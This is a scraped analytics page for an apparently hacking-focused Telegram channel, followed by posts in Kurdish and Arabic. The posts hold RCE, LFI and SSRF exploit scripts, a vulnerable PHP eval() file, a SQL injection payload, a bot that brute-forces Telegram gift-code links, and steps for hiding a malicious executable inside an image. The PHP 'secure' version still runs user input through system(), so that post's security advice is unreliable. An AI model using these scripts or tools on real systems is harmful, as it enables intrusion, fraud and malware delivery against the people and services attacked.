1 001
Subscribers
No data24 hours
-77 days
-3330 days
Data loading in progress...
Similar Channels
Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
December '24
December '24
+3
in 0 channels
November '24
+8
in 0 channels
Get PRO
October '24
+7
in 0 channels
Get PRO
September '24
+34
in 1 channels
Get PRO
August '24
+54
in 0 channels
Get PRO
July '24
+21
in 0 channels
Get PRO
June '24
+17
in 0 channels
Get PRO
May '24
+102
in 0 channels
Get PRO
April '24
+2 098
in 6 channels
Get PRO
March '24
+13
in 0 channels
Get PRO
February '24
+862
in 3 channels
Get PRO
January '24
+158
in 3 channels
Get PRO
December '23
+467
in 2 channels
Get PRO
November '23
+580
in 11 channels
Get PRO
October '23
+479
in 24 channels
Get PRO
September '23
+170
in 0 channels
Get PRO
August '23
+99
in 0 channels
Get PRO
July '23
+425
in 0 channels
Get PRO
June '23
+950
in 0 channels
Get PRO
May '23
+290
in 0 channels
Get PRO
April '23
+695
in 0 channels
Get PRO
March '23
+1 021
in 0 channels
Get PRO
February '23
+35
in 0 channels
Get PRO
January '23
+1
in 0 channels
Get PRO
December '22
+2
in 0 channels
Get PRO
November '22
+12
in 0 channels
Get PRO
October '22
+666
in 0 channels
Get PRO
September '22
+38
in 0 channels
Get PRO
August '22
+588
in 0 channels
Get PRO
July '22
+862
in 0 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 31 December | 0 | |||
| 30 December | 0 | |||
| 29 December | 0 | |||
| 28 December | 0 | |||
| 27 December | 0 | |||
| 26 December | 0 | |||
| 25 December | +1 | |||
| 24 December | 0 | |||
| 23 December | 0 | |||
| 22 December | 0 | |||
| 21 December | +1 | |||
| 20 December | 0 | |||
| 19 December | 0 | |||
| 18 December | 0 | |||
| 17 December | 0 | |||
| 16 December | 0 | |||
| 15 December | 0 | |||
| 14 December | 0 | |||
| 13 December | +1 | |||
| 12 December | 0 | |||
| 11 December | 0 | |||
| 10 December | 0 | |||
| 09 December | 0 | |||
| 08 December | 0 | |||
| 07 December | 0 | |||
| 06 December | 0 | |||
| 05 December | 0 | |||
| 04 December | 0 | |||
| 03 December | 0 | |||
| 02 December | 0 | |||
| 01 December | 0 |
Channel Posts
من دەمەوێت باسی بابەتێکی تا ڕادەیەک گرنگ بکەم: - باوترین پرسیار کە لەم ڕۆژانەدا ڕووبەڕوومان دەبێتەوە ئەوەیە: - برام دەمەوێت فێری هاککردن بم، - بێگومان وەڵامەکە بۆ زۆر کەس ئەوەیە - فێری ئاسایش
ببە، . پاشان بەرنامەسازی، پاشان هاککردنی سایتەکان، و بەردەوام بە لە ڕێگاکەتدا - بەڵام ئەم وەڵامە کەمێک هەڵەیە - دوور لە بابەتەکەی هاککردن
کە ماوەیەکی زۆر باسی لێوە دەکرێت، بەو پێیەی مەودای فراوانی هەیە و هەرگیز کۆتایی نییە - بەڵام چۆن دەتەوێت کەسێک فێری ئاسایش یان پرۆگرامسازی بێت لە کاتێکدا شارەزای زمانی ئینگلیزی نییە - چۆن دەتەوێت کەسێک فێری هاککردن بێت، ئایا... ماڵپەڕ یان ئامێرەکان، لە کاتێکدا
شارەزا نین؟
بەکارهێنانی کۆمپیوتەر بە شێوەیەکی دروست - بێگومان زۆر کەس پێیان وایە کە کۆمپیوتەر تەنها دوگمەی پاوەر دەدات و وێبگەڕێک و WinRAR بار دەکات و کۆپی و لێدان دەکات نەخێر نەخێر - دەبێت شارەزا بیت لە بەکارهێنانی ویندۆز یان لینوکس بە شێوەیەکی دروست - دەبێت بزانیت فەرمانەکانی cmd لە ویندۆز یان...
فەرمانەکانی لینوکس - پێویستە بزانیت کۆمپیوتەرەکەت لە چی دروستکراوە، چۆن فەرمانەکان وەردەگرێت، چۆن جێبەجێیان دەکات، هەروەها بزانیت چۆن هەڵە یان
کێشەکان چارەسەر بکەیت کە ڕووبەڕووت دەبێتەوە - دەبێت بزانیت چی لە پشت شاشەکە یان لە ژێر کیبۆردەوە هەیە، نەک تەنها کە لە...
کیبۆردەکە پێمان وایە ئێمە شارەزا بووین لە بەکارهێنانی سیستەمەکە - ئینگلیزی: - چۆن کەسێک بە خۆی بڵێت هاکەر لە کاتێکدا ئینگلیزی نازانێت چۆن دەتوانێت وێنەی هاک دابنێت کە وشەی ئینگلیزی لەسەر نووسرابێت و نەیانزانێت - ئامۆژگاری: پەلە مەکە و بە خۆت بڵێ هاکەر بۆ ماوەی ٣ یان ٥ ساڵ فێربە و فێربە
پاشان خۆت بخەرە سەر گۆڕەپانەکە و
بڵێ کە هێشتا فێردەبیت - تەنها بۆ زمانەکانی بەرنامەسازی، لانیکەم پێویستت بە ٥ ساڵ دەبێت بۆ ئەوەی شارەزا بیت لێیان، کەواتە چۆن دەتوانیت بۆ ماوەی دوو ساڵ بە خۆت بڵێیت پرۆگرامەر لە کاتێکدا تەنها شارەزایت لە هەندێک کۆددا بە زمانێک؟- کاتێک وەشانی پێداچوونەوەت بۆ دابەزاند، بە خۆت
مەڵێ ئاسایش.
وە چەند ئامرازێک بۆ شکاندنی پاراستنەکان و دەرهێنانی زانیاری کانگاکان - ئامۆژگاری: خۆت پەیوەندی بە گروپێکەوە مەکە لە فەیسبووک و دوژمنایەتی لەگەڵ کەسێک دروست مەکە - وە دوا ئامۆژگاری - لەبیرت نەچێت کێ یارمەتیت دا ڕۆژێک و شانازی بە کەسەوە مەکە کە ڕۆژێک یارمەتیت دا - هەموومان فێر دەبین، و لە نەزانیمانەوە هەڵە دەکەین، و
لە...
ئێمە لە هەڵەکانمان فێر دەبین
- (8
ساڵ و دواتر وێنەی هاکەرێک دادەنێین - هەندێک کەس وێنەی هاکەرێک دادەنێن و بە خەڵک پێدەکەنن و ئەکاونت دەدزن و نازانن چییە، وە ئەویش لە هیچ شتێکدا باش نییە. هاککردن تەنها پێی وایە کە حساباتەکان دەفڕن.
هاکەر واتای چییە؟
| 2 | -کۆدی درووستکردنی دیاری بە وردییەکی زۆر بەرز و ڕێژەی گرتنی بەرز
-کۆدەکە پشکنین نەکراوە (بە دەست پشکنین بکە بە کلیککردن لەسەر بەستەرەکە)
import random
import string
import telebot
b = telebot.TeleBot("Token")
def g(length=27):
a = string.ascii_letters + string.digits
f = "AQAA"
r = random.randint(1, 6)
c = ''.join(random.choice(a) for i in range(r))
l = length - len(f) - len(c)
c += ''.join(random.choice(a) for i in range(l))
return c[:12] + f + c[12:]
@b.message_jackson(commands=['start'])
def s(message):
b.reply_to(message, """<strong> بەخێربێن، /check بنێرە بۆ دروستکردنی ١٠ بەستەر
-ناردن /یارمەتی بۆ تێگەیشتن لە چۆنیەتی پشکنینی لینکەکان
</strong>""",parse_mode="html")
@b.message_jackson(commands=['check'])
def c(message):
for _ in range(10):
g_code = g()
t_link = f"https://t.me/giftcode/{g_code}"
b.send_message(message.chat.id, t_link)
@b.message_jackson(commands=['help'])
def h(message):
b.reply_to(message, """<strong>- لە یەک ئەکاونتەوە دەتوانیت هەر ٢٠ بەستەرێک پشکنین بکەیت
- ئەمەش واتە پێویستە ئەکاونتی تێلێگرامی زۆرت هەبێت بۆ پشکنینی زۆرترین بڕی لینکەکان (وە هەر ئەکاونتێک دەتوانێت ٢٠ لینک بپشکنێت)
- </strong>""",parse_mode="html")
b.polling() | 67 |
| 3 | WormGPT چییە و چی دەکات؟
ڕەنگە تا ئێستا گوێت لە ChatGPT بووبێت، کە بزوێنەرێکی AI یە کە وەڵامی زۆر ورد دەداتەوە بۆ جۆرە جیاوازەکانی پرسیار شتێکی زۆر درێژ و ئاڵۆز، وەک وتار، “تایپ” بکە
بلۆگ یان شیعر.
ئەوەی نوێیە ئەوەیە کە ئێستا هاکەرەکان بە بەکارهێنانی WormGPT چوونەتە ناو یارییەکەوە، کە پلاتفۆرمی AI ی درووستکەرە و بۆ یارمەتیدانی چالاکییە تاوانکارییەکان داڕێژراوە، بەپێی توێژەران، WormGPT لە مەکۆکانی وێبی تاریکدا وەک "گەورەترین دوژمنی ChatGPT" بانگەشە دەکرێت، و ڕێگە بە بەکارهێنەران دەدات هەموو شتێک بکەن جۆرەکانی... شتەکان
نایاسایی.
بە تایبەتی WormGPT دروستکردنی ئیمەیڵە ساختە زۆر قەناعەتبەخشەکان بە شێوەیەکی ئۆتۆماتیکی دەکات کە بەپێی وەرگرەکە گونجاوە، بەهۆی ئەم پلەیە بەرزەی خۆکارکردن، ئەگەری ئەوە زیاترە خەڵک فێڵ لە وشەی نهێنی بکەن یان بەرنامەی زیانبەخش. | 53 |
| 4 | شەش دابەشکردنی لینوکس بۆ کەسانی سەرەتایی
دابەشکردنی لینوکس- زۆرجار کورت دەکرێتەوە بۆ "Linux distro"- وەشانی سیستەمی کارپێکردنی لینوکس سەرچاوە کراوەیە لەگەڵ پێکهاتەکانی تر، وەکو دامەزرێنەرەکان، ئامرازەکانی بەڕێوەبردن و نەرمەکاڵا زیادەکان وەکو هایپەرڤایزەری KVM.
1.Zorin OS: ڕووکارێکی بەکارهێنەر هاوشێوەی ویندۆز دابین دەکات و بە باشی گونجاوە بۆ کەسانی سەرەتایی لە هەمان کاتدا چەندین تایبەتمەندی نایاب پێشکەش دەکات هەروەها.
2.ئوبونتو: یەکێکە لە دابەشکردنە بەناوبانگەکانی لینوکس و کۆمەڵگەیەکی پشتگیری گەورەی هەیە.
3.Manjaro: لەسەر بنەمای ئارچ لینوکس دامەزراوە و ئینستۆلەرێکی ئاسان بۆ بەکارهێنانی هەیە کە دامەزراندنی ئاسان دەکات.
4.Linux Mint: لەسەر بنەمای Ubuntu دامەزراوە و ژینگەی دیسکتۆپی جیاوازی هەیە وەک Cinnamon, Xfce, و MATE هەڵبژاردەیەکی بەناوبانگە بۆ کەسانی سەرەتایی و کۆمەڵگەیەکی پشتگیری گەورەی هەیە.
5. سیستەمی کارپێکردنی سەرەتایی: لەسەر بنەمای سیستەمی ئوبونتو دامەزراوە و ڕووکارێکی بەکارهێنەری سادە و ڕەسەن و ئاسانی بەکارهێنانی هەیە
لینوکس لایت: لەسەر بنەمای ئوبونتو دامەزراوە و ژینگەیەکی سووکە لە سەر مێز کە بەکارهێنانی ئاسان دەکات تەنانەت لەسەر ڕەقەکاڵا کۆنەکانیش.
6.Linux Lite: لەسەر بنەمای ئوبونتو دروستکراوە و ژینگەیەکی سووکە بۆ سەر مێز کە بەکارهێنانی ئاسان دەکات تەنانەت لەسەر ئامێرە کۆنەکانیش. | 50 |
| 5 | ئیستغلالکردنی لاوازی جێبەجێکردنی کۆدی دوور (RCE) لە پایثۆن
سڵاو لە ئێوەی بەڕێز
ئەمڕۆ باس لە چۆنیەتی ئیستغلالکردنی لاوازی Remote Code Execution (RCE) دەکەین بە بەکارهێنانی زمانی پایتۆن ئەم لاوازییە ڕێگە بە هێرشبەر دەدات کۆدی ئارەزوومەندانە لەسەر سێرڤەری ئامانج جێبەجێ بکات، ئەمەش وای لێدەکات کۆنترۆڵی تەواوی سیستەمەکە بەدەستبهێنێت.
کۆد
import os
# فەنکشنێک بۆ جێبەجێکردنی فەرمانەکان
def execute_command(command):
return os.popen(command).read()
# هاتنە ژوورەوەی بەکارهێنەر فلتەر نەکراوە
user_input = "ls; echo 'Hacked!'"
output = execute_command(user_input)
# ئەنجامەکان چاپ بکە
print(output)
# گەشەپێدەر: https://t.me/CRAKAR_TEM
#شیکاری: لەم کۆدەدا فەنکشنێکمان دروستکرد کە هەر فرمانێک کە لەلایەن os.popen ەوە بۆی بگوازرێتەوە جێبەجێ دەکات دوای ئەوە ئینپوتمان لە بەکارهێنەر وەرگرت و ڕاستەوخۆ جێبەجێمان کرد و ئەمەش هۆکاری سەرەکی بوونی ئەو لاوازییەیە.
چارەسەر: بۆ چارەسەرکردنی ئەم لاوازییە، پێویستە ئینپوتەکان پشتڕاست بکەینەوە و دڵنیا بین لەوەی کە سەلامەتن پێش ئەوەی جێبەجێیان بکەین
import subprocess
def secure_execute(command):
allowed_commands = ['ls', 'pwd', 'whoami']
if command in allowed_commands:
return subprocess.check_output([command]).decode()
else:
return "Command not allowed."
user_input = "ls"
output = secure_execute(user_input)
print(output)
ئێمە دڵنیا دەبینەوە لەوەی کە ئەو فەرمانانەی جێبەجێیان دەکەین پارێزراون و پێشوەختە دیاری کراون.
ئەمە ڕوونکردنەوەیەکی سادە بوو بۆ لاوازی Remote Code Execution و چۆنیەتی ئیستغلالکردنی و چارەسەرکردنی بە بەکارهێنانی زمانی پایثۆن. | 57 |
| 6 | ناونیشانی پۆست: ئیستغلالکردنی لاوازی LFI (Local File Inclusion) بە بەکارهێنانی پایثۆن
ناوەڕۆک
لەم پۆستەدا باس لە لاوازی LFI دەکەین کە ڕێگە بە هێرشبەر دەدات فایلەکانی سەر سێرڤەرەکە بخوێنێتەوە یان جێبەجێی بکات لە ڕێگەی لاوازییەکەوە لە بەرنامەکەدا.
ڕوونکردنەوەکە:
import requests
# لینکی ئامانج
target_url = "http://example.com/index.php?page="
# ئەو فایلە هەڵبژێرە کە دەمانەوێت بیخوێنینەوە
file_to_read = "../../../../etc/passwd"
# بەستەری کۆتایی ڕێکبخە
exploit_url = target_url + file_to_read
# داواکارییەکە بنێرە بۆ سێرڤەر
response = requests.get(exploit_url)
# ئەنجام پیشان بدە
print(response.text)
ئەم کۆدە لە پایثۆن بەکاردێت بۆ ئیستغلالکردنی لاوازی LFI لە بەرنامەیەکی وێبدا بە دەرزی لێدانی ڕێڕەوی پەڕگەی سیستەم، هێرشبەر دەتوانێت فایلە هەستیارەکانی وەک /etc/passwd بخوێنێتەوە کە داتای بەکارهێنەر لە سیستەمی لینوکسدا لەخۆدەگرێت.
تێبینی: ئەم کۆدانە تەنها لە دۆمەینی یاساییدا بەکاربهێنە هەموو مافەکان بۆ کەناڵەکە پارێزراوە | 46 |
| 7 | from urllib import request
from urllib.request import urlopen, Request
import json, socket
url = ""
headers = {"User-Agent": "Mozilla/5.0", "accept-language": "en-US,en"}
data = {}
prox = "127.0.0.1:443"
method = "POST"
timeout = socket._GLOBAL_DEFAULT_TIMEOUT
# Change Proxy .......(-_-) .
proxy = request.ProxyHandler(
{"http":prox}
)
request.install_opener(request.build_opener(proxy))
if not isinstance(data, bytes):
data = bytes(json.dumps(data), encoding="utf-8")
if url.lower().startswith("http"):
res = Request(url, headers=headers, method=method, data=data)
else:
raise ValueError("Invalid URL")
response = urlopen(res, timeout=timeout)
print(response) | 1 |
| 8 | • مثال لعمل ركوست مضمون بدون حظر ،
• استخدام بروكسيات ( ضعيفه ، متوسطه ، قويه ) ، | 1 |
| 9 | بە سەیفلاین سایتەکەت لە هاکەرەکان بپارێزە!
ئەگەر ماڵپەڕ یان ئەپڵیکەیشنێکت هەیە و لە هێرشی ئەلیکترۆنی دەترسیت، با ئەو چارەسەرەت پێ بڵێم کە بە تەواوی دڵنیات دەکاتەوە: SafeLine
SafeLine چییە؟
کەواتە، چ جۆرە هێرشێک دەتوانیت بگرێت؟
SQL Injection: بیهێنە بەرچاوت کەسێک هەوڵی دزینی زانیارییە هەستیارەکانت بدات، وەک وشەی نهێنی SafeLine یەکسەر دەیوەستێنێت!
XSS (Cross-Site Scripting): کاتێک هاکەرێک هەوڵی دانانی کۆدی زیانبەخش دەداتە سەر ماڵپەڕەکەت بە مەبەستی فریودانی بەکارهێنەران.
3. Remote Code Execution: مەترسیدارترین هێرشە کە ڕێگە بە هاکەر دەدات کۆدەکان لە دوورەوە جێبەجێ بکات و کۆنترۆڵی سێرڤەرەکەت بکاتەوە، هیچ چانسێک نییە بۆ ئەوەی ئەمە ڕووبدات!
بۆچی پێویستە SafeLine بەکاربهێنیت؟
پاراستنی گشتگیر لە هەموو ئەو هێرشانەی کە ماڵپەڕەکان دەکەنە ئامانج.
بەکارهێنانی ئاسانە: لە چەند خولەکێکدا دایبمەزرێنە و با بەردەوام بتپارێزێت.
سەرچاوە کراوە: ئەمەش واتە ئەگەر ئەزموونی بەرنامەسازیت هەبێت دەتوانیت بە ئارەزووی خۆت دەستکاری بکەیت.
چۆن دەست پێدەکەیت تەنها پێویستە سەردانی لینکی GitHub بکەیت و دەست بکەیت بە دامەزراندنی ئامرازەکە!
https://github.com/chaitin/SafeLine | 64 |
| 10 | ###وەسفکردنی پڕۆژەکە: ئەم پڕۆژەیە چۆنیەتی ئیستغلالکردنی لاوازی جێبەجێکردنی کۆدی دوور (RCE) لە بەرنامەیەکی سادەی PHPدا نیشان دەدات پڕۆژەکە کۆدەکانی تێدایە کە لاوازی RCE لەخۆدەگرێت جگە لە کۆدی باشترکراو بۆ دوورکەوتنەوە لەم لاوازییە.
###ناوەڕۆکی پڕۆژەکە: 1. فایلە vulnerable.php: - کۆدی تێدایە کە بەدەست لاوازی RCE دەناڵێنێت - نموونەیەکە بۆ چۆنیەتی ئیستغلالکردنی لاوازییەکە.
2. فایلە secure.php: کۆدی پارێزراوی تێدایە لەگەڵ پشتڕاستکردنەوەی هاتنە ژوورەوەی بەکارهێنەر و پاککردنەوەی.
3. فایلە README.md: - ڕوونکردنەوەیەکی وردی تێدایە لەسەر لاوازییەکە و چۆنیەتی ئیستغلالکردنی، ئەمە جگە لەو هەنگاوانەی کە بۆ پاراستنی کۆدەکە پەیڕەو دەکرێت.
کۆد
<?php
// vulnerable.php
// This file is vulnerable to RCE
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
eval($cmd);
}
?>
###چۆنیەتی پاراستن:
<?php
// secure.php
// This file is secure from RCE
if (isset($_GET['cmd'])) {
$cmd = escapeshellcmd($_GET['cmd']);
system($cmd);
}
?>
چۆنیەتی بەکارهێنانی پڕۆژەکە: 1. دابەزاندن یان کلۆنکردنی پڕۆژەکە لە GitHub بە بەکارهێنانی ئەم فرمانە:
git clone https://github.com/yourusername/rce-php-example.git
2. فایلەکان لە دەستکاریکەری دەقی دڵخوازتدا بکەرەوە و پێداچوونەوە بە کۆدەکەدا بکە 3. فایلە README.md بخوێنەرەوە بۆ ڕوونکردنەوەیەکی ورد لەسەر لاوازییەکە و چۆنیەتی پاراستنی کۆدەکە. | 47 |
| 11 | ئیستغلالکردنی لاوازی SSRF (Server-Side Request Forgery)لە پایثۆن
ناوەڕۆک
لەم پۆستەدا باس لە چۆنیەتی ئیستغلالکردنی لاوازی SSRF دەکەین بە بەکارهێنانی زمانی پایثۆن لاوازی SSRF لاوازییەکی جدییە کە ڕێگە بە هێرشبەر دەدات داواکاری لە سێرڤەری ئامانجدارەوە بنێرێت بۆ
سێرڤەرەکانی تر بەبێ مۆڵەت.
کۆد: ١.
import requests
def exploit_ssrf(url):
#
target_url = url
payload = 'http://127.0.0.1:8000' # ا
try:
response = requests.get(target_url, params={'url': payload})
print(response.text)
except requests.exceptions.RequestException as e:
print(f"Error: {e}")
if __name__ == "__main__":
exploit_url = "http://example.com/vulnerable-endpoint"
exploit_ssrf(exploit_url)
وەسف: کۆدی سەرەوە داواکاری GET دەنێرێت بۆ ناونیشانی دیاریکراو کە بەستەری ئامانج وەک پارامێتەر تێدەپەڕێنێت ئەم کۆدە دەتوانرێت بەکاربهێنرێت بۆ تاقیکردنەوەی لاوازییەکانی SSRF لە بەرنامەکانی وێبدا هەمیشە دڵنیابە لە وەرگرتنی مۆڵەت | 40 |
| 12 | چۆنیەتی دروستکردنی بۆمبی وێنە بە بەکارهێنانی ئامرازی Steghide لەسەر لینوکس:
1. دامەزراندنی Steghide: تێرمیناڵێک بکەرەوە و ئامرازی Steghide دابنێ بە بەکارهێنانی ئەم فرمانەی خوارەوە:
sudo apt-get install steghide
ئامادەکردنی فایلەکان: - ئامادەکردنی ئەو وێنەیەی کە دەتەوێت بەکاری بهێنیت (بۆ نموونە image.jpg - ئامادەکردنی ئەو فایلە زیانبەخشەی کە دەتەوێت لەناو وێنەکەدا بیشاریتەوە (بۆ نموونە payload.exe).
شاردنەوەی فایلەکە لەناو وێنەکەدا: ئەم فرمانە بەکاربهێنە بۆ شاردنەوەی فایلەکە لەناو وێنەکەدا:
steghide embed -cf image.jpg -ef payload.exe
داوات لێدەکرێت وشەی نهێنی دابنێیت بۆ پاراستنی زانیارییە جێگیرکراوەکان وشەی نهێنی بەهێز هەڵبژێرە.
4. دەرهێنانی فایلەکە لە وێنەکە: بۆ دەرهێنانی فایلە زیانبەخشەکە لە وێنەکە دواتر ئەم فرمانە بەکاربهێنە:
steghide extract -sf image.jpg
داوات لێدەکرێت ئەو وشەی نهێنییە دابنێیت کە پێشتر داناوە. | 40 |
| 13 | استغلال ثغرة SSRF (Server-Side Request Forgery) بلغة بايثون
المحتوى:
في هذا المنشور، سنتناول كيفية استغلال ثغرة SSRF باستخدام لغة بايثون. تعد ثغرة SSRF من الثغرات الخطيرة التي تسمح للمهاجم بإرسال طلبات من الخادم المستهدف إلى خوادم أخرى دون إذن.
الكود:
import requests
def exploit_ssrf(url):
#
target_url = url
payload = 'http://127.0.0.1:8000' #
try:
response = requests.get(target_url, params={'url': payload})
print(response.text)
except requests.exceptions.RequestException as e:
print(f"Error: {e}")
if __name__ == "__main__":
exploit_url = "http://example.com/vulnerable-endpoint"
exploit_ssrf(exploit_url)
الوصف:
الكود أعلاه يقوم بإرسال طلب GET إلى العنوان المحدد مع تمرير الرابط المستهدف كمعامل. يمكن استخدام هذا الكود لاختبار ثغرات SSRF في تطبيقات الويب. تأكد دائمًا من الحصول على إذن قبل إجراء أي اختبار أمني. | 1 |
| 14 | شیکردنەوەی فایلەکانی PDF بۆ دیاریکردنی لاوازییەکان بە بەکارهێنانی پایتۆن
ناوەڕۆک:
لەم پۆستەدا بە چۆنیەتی شیکردنەوەی فایلەکانی PDF بۆ دیاریکردنی لاوازییەکان بە بەکارهێنانی کتێبخانەی PyMuPDF لە پایتۆندا دەڕۆین.
کۆد: ١.
import fitz # PyMuPDF
def analyze_pdf(file_path):
pdf_document = fitz.open(file_path)
for page_num in range(len(pdf_document)):
page = pdf_document.load_page(page_num)
text = page.get_text("text")
print(f"Page {page_num + 1}:\n{text}\n{'-'*40}")
if __name__ == "__main__":
pdf_file_path = "example.pdf"
analyze_pdf(pdf_file_path)
وەسف: ئەم کۆدە دەتوانرێت بۆ شیکردنەوەی لاپەڕەی دەقی فایلەکانی PDF و دەرهێنانی ناوەڕۆکی دەقی لێیان بەکاربهێنرێت ئەمە دەتوانێت یارمەتیدەر بێت بۆ دۆزینەوەی دەقی شاراوە یان داتا هەستیارەکان کە لەوانەیە لە فایلەکەدا هەبن.
هەموو مافەکان بۆ کەناڵەکە پارێزراوە | 37 |
| 15 | ئەگەر پێویستت بە تاقیکردنەوەی لاوازییەکە بوو، باشتر وایە ژینگەیەکی تاقیکردنەوەی ناوخۆیی لەسەر ئامێرەکەت دروست بکەیت و کۆدەکە بە شێوەیەکی پارێزراو بۆی جێبەجێ بکەیت بە بەکارهێنانی Flask.
##ژینگەی تاقیکردنەوەی ناوخۆیی بۆ جێبەجێکردنی کۆدی دوور (RCE
دروستکردنی بەرنامەی Flask:
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def index():
return '''
<form method="post" action="/execute">
<input type="text" name="command">
<input type="submit" value="Execute">
</form>
'''
@app.route('/execute', methods=['POST'])
def execute():
command = request.form['command']
output = os.popen(command).read()
return f'<pre>{output}</pre>'
if __name__ == '__main__':
app.run(debug=True)
https://t.me/CRAKAR_TEM#:
کۆدەکە لە فایلێکدا هەڵبگرە بە ناوی app.py.2 کۆدەکە بە بەکارهێنانی فرمانی python جێبەجێ بکە
app.py.
3. وێبگەڕەکەت بکەرەوە و بچۆ بۆ http:// .
://127.0.0.1:5000/.
تاقیکردنەوەی لاوازییەکە: - هەر فرمانێک وەک ls یان echo 'Hacked!' | 48 |
| 16 | ↫︙کۆدی پایثۆن جێبەجێ بکە
python
# Requier Modules
import subprocess, sys
#Subproccess run Python Code
PythonCode = "print('Hi Is Rad')" # Python Code
Process = subprocess.run(
args=[sys.executable, '-c', PythonCode], capture_output=True, text=True) # Excute Python Code
#Result
StdOut , StdErro = Process.stdout, Process.stderr | 48 |
| 17 | چۆن کتێبخانەی pwntools بۆ تاقیکردنەوەی دزەکردن بەکاردەهێنیت pwntools بە یەکێک لە بەهێزترین ئامرازەکان دادەنرێت کە لە CTF و
تاقیکردنەوەی دزەکردندا بەکاردەهێنرێت، بە تایبەت لە مامەڵەکردن لەگەڵ لاوازییەکانی پەیوەست بە ئیستغلالکردنی دووانەیی هەنگاوە بنەڕەتییەکان: دامەزراندنی کتێبخانەکە:
pip install pwntools
دروستکردنی سکریپتێکی سادە: سەرەتا بە نووسینی سکریپتێکی سادە دەست پێدەکەین کە پەیوەندی لەگەڵ سێرڤەرێکی دوورەوە دەکات و فەرمانێکی دیاریکراو جێبەجێ دەکات.
from pwn import *
#
conn = remote('example.com', 1234)
#
conn.sendline('hello')
response = conn.recvline()
print(response.decode())
#
conn.close()
شیکاری دووانەیی: دەتوانیت کتێبخانەکە بەکاربهێنیت بۆ شیکردنەوەی دووانەیی و دەرهێنانی لاوازییەکان.
from pwn import *
elf = ELF('vulnerable_binary')
print(elf.symbols)
پرۆژەی تەواو: ئەگەر دەتەوێت بابەتەکە بەرەو ئاستێکی پێشکەوتوو ببەیت، دەتوانیت سکریپتێکی تەواو بۆ هاککردنی دووانەییەکە دابڕێژیت: | 54 |
| 18 | ئیستغلالکردنی لاوازی SQL Injection لە Ruby
وەسف: لە وانەی ئەمڕۆدا باس لە یەکێک لە مەترسیدارترین لاوازییەکان دەکەین کە دەتوانرێت لە ماڵپەڕەکاندا بدۆزرێتەوە، کە بریتییە لە SQL Injection بە بەکارهێنانی زمانی Ruby ئەم لاوازییە ڕێگە بە هێرشبەر دەدات دەستکاری بنکەدراوە بکات بە دانانی کۆدی زیانبەخشی SQL بۆ ناو ئەو نووسراوانەی کە... مامەڵە لەگەڵ بنکەدراوەدا بکەن.
کۆدێکی سادە دەبینین کە چۆن دەتوانیت ئەم لاوازییە بدۆزیتەوە و بیقۆزیتەوە.
کۆد: ١.
require 'pg'
#
conn = PG.connect(dbname: 'testdb', user: 'user', password: 'password')
SQL Injection
puts "ID:"
user_id = gets.chomp
#
query = "SELECT * FROM users WHERE id = '#{user_id}'"
#
conn.exec(query) do |result|
result.each do |row|
puts row
end
end
وردەکاری: لەم کۆدەدا ئەو user_id یەی کە بەکارهێنەر دەیخاتە ناویەوە ڕاستەوخۆ زیاد دەکرێت بۆ ڕستەی SQL بەبێ هیچ پرۆسەیەکی پشتڕاستکردنەوە ئەمەش وا دەکات هێرشبەر بتوانێت ڕستەی زیانبەخشی SQL وەک:
1' OR '1' = '1
کە ڕێگە بە پیشاندانی هەموو داتاکان دەدات لە خشتەی بەکارهێنەران!
چۆنێتی پاراستن: بۆ پاراستنی بەرنامەکە لەم لاوازییە، پێویستە پرسیارە ئامادەکراوەکان بەکاربهێنین بۆ ڕێگریکردن لە دەرزی لێدانی کۆد.
ئەمە نموونەیەکی سادەیە بۆ ئیستغلالکردنی لاوازییەکی مەترسیدار هەمیشە دڵنیابە لە پشتڕاستکردنەوەی زانیارییەکانی ناو کەناڵەکە | 50 |
| 19 | بە ئاسانی دۆزینەوەی لاوازییە شاراوەکان بە بەکارهێنانی
AutoRecon AutoRecon
ئامرازێکی ئۆتۆماتیکی سەرسوڕهێنەرە کە تایبەتە بە سیخوڕیکردن و دۆزینەوەی لاوازییەکان بە خێرایی و بە وردی ئامرازەکە بە "قۆڵی ڕاست"
دادەنرێت بۆ هەر هاکەرێکی پیشەیی یان تاقیکەرەوەی دزەکردن کە هەوڵدەدات دۆمەینە زەبەلاحەکان بە کەمترین هەوڵ و کات شی بکاتەوە تایبەتمەندییە گرنگەکان: - بە تەواوی
ئۆتۆماتیکی: ئامرازەکە دەست پێدەکات
پرۆسەی سکانکردنەکە دەستبەجێ لەگەڵ چوونە ناو ئامانجەکەدا ئۆتۆماتیکی دەبێت، لەگەڵ هەموو قۆناغەکانی وەک سکانکردنی دەروازەکان، دۆزینەوەی خزمەتگوزارییەکان، و گەڕان بەدوای
خاڵە لاوازەکاندا - ڕاپۆرتە ڕێکخراوەکان: ئەنجامەکان بە شێوەیەکی ڕێکخراو بۆت دێنە دەرەوە و ئامادەن بۆ شیکاری.
saving you hours of manual work
بەکارهێنان:
autorecon target.com
دوای دەستپێکردنی چی ڕوودەدات - هەموو دەروازە کراوەکان سکان دەکرێن - ئەو خزمەتگوزارییانەی کە لەسەر ئەو دەروازانە کاردەکەن دەستنیشان دەکرێن - ڕاپۆرتێکی کۆتایی کۆدەکرێتەوە کە هەموو شتێکی تێدایە کە پێویستە بۆ دەستپێکردنی هێرشەکە تۆ لەگەڵ هەموو ئەو زانیارییانەی کە پێویستت پێیانە لەسەر تاوەیەکی زیوین، و دەستپێکردنێکتان
پێدەدات
بەهێزە بۆ ئیستغلالکردنی پیشەیی.>ئەگەر دەتەوێت فێری بەکارهێنانی ئامرازە بەهێزەکانی ئۆتۆماتیکی بیت وەک
AutoRecon
بۆ باشترکردنی تواناکانی ئاسایشی ئەلیکترۆنیت، چانسی بەشداریکردن لە بووتکەمپە گشتگیرەکەمان لەدەست مەدە لە سەرەتاییەکانەوە تا پڕۆکان، ئێمە هەموو شتێک هەنگاو بە هەنگاو دەگرێتەوە وردەکارییەکان لێرەدا. | 48 |
| 20 | No text... | 38 |
